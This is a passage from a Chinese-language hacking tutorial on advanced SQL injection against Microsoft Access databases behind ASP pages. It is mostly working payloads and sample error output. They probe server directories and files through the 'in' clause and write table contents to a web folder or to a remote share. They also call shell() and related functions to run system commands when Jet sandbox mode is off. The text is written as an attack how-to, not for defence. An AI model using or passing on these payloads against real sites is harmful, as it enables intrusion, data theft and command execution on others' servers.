- ·上一篇内容:作为一名黑客应掌握哪些技能
- ·下一篇内容:黑客初级技术简述
Access数据库注入技术高级玩法
4.映射本地驱动器
使用in语句,比如 productshow.asp?id=25 and 1=2 union select * from admin in '.'
返回的错误:
Microsoft JET Database Engine 错误 '80004005'
Microsoft Jet 数据库引擎打不开文件'c:\windows\system32\inetsrv'。 它已经被别的用户以独占方式打开,或没有查看数据的权限。
此查询可用于检测目录和文件,对于猜解网站目录很有用。
再比如:productshow.asp?id=25 and 1=2 union select * from admin in 'C:\windows\ODBC.ini'
返回错误:
Microsoft JET Database Engine 错误 '80004005'
不可识别的数据库格式 'C:\windows\ODBC.INI'。
说明该文件存在,只是不是数据库。
productshow.asp?id=25 and 1=2 union select * from admin in 'C:\windows\123.ini'
返回错误:
Microsoft JET Database Engine 错误 '80004005'
找不到文件 'C:\windows\123.ini'。
该文件不存在。
5.写文件
说到写文件,这里不得不提下lake2的那篇文章,"SQL注入Access导出WebShell"
如果我们执行这样的语句:
SELECT * into [test.txt] in 'd:\web\' 'text;' from admin
SELECT * into [test.txt] in '\\yourip\share' 'text;' from admin
在d:\web目录下就会生成test.txt文件,其内容就是表admin的内容,这条语句要执行是要有一定的条件的,单句执行没什么问题,但是放到注入点里执行时,等待你的是2种结果:1.动作查询不能作为行为的来源。2,如果在子语句,会提示子语句不支持此查询,也就是说不能在子查询和UNION查询中,实用价值不大实属鸡肋。但是这个还是必须得知道的。
6.执行系统ming令
首先有必要介绍一下沙盒模式为了安全起见,MS在Jet引擎的Sp8中,设置了一个名为SandBoxMode的开关,这个开关是开启一些特殊函数在另外的执行者中执行的权限的.它的注册表位置在
HKEY_LOCAL_MACHINE\SoftWare\Microsoft\Jet\4.0\Engine\SandBoxMode里,默认是2.微软关于这个键值的介绍为:0为在任何所有者中中都禁止起用安全设置,1为仅在允许的范围之内,
2则是必须是Access的模式下,3则是完全开启,连Access中也不支持.
Access也能执行系统ming令,有个前提条件就是沙盒模式要是关闭的。如:
productshow.asp?id=25 and 1=2 union select curdir() from msysaccessobjects
and 1=2 union select dir('c:\ ') from msysaccessobjects
union select environ(1) from msysaccessobjects
union select filedatetime('c:\boot.ini') from msysaccessobjects
union select filelen('c:\boot.ini') from msysaccessobjects
union select getattr('c:\ ') from msysaccessobjects
union select shell('') from msysaccessobjects
可执行文件将以IIS匿名账户运行
如果沙盒模式开启的话,就会返回这样的错误
Microsoft JET Database Engine 错误 '80040e14'
表达式中 'curdir' 函数未定义
这次就先总结这么多,下次想起了再补充.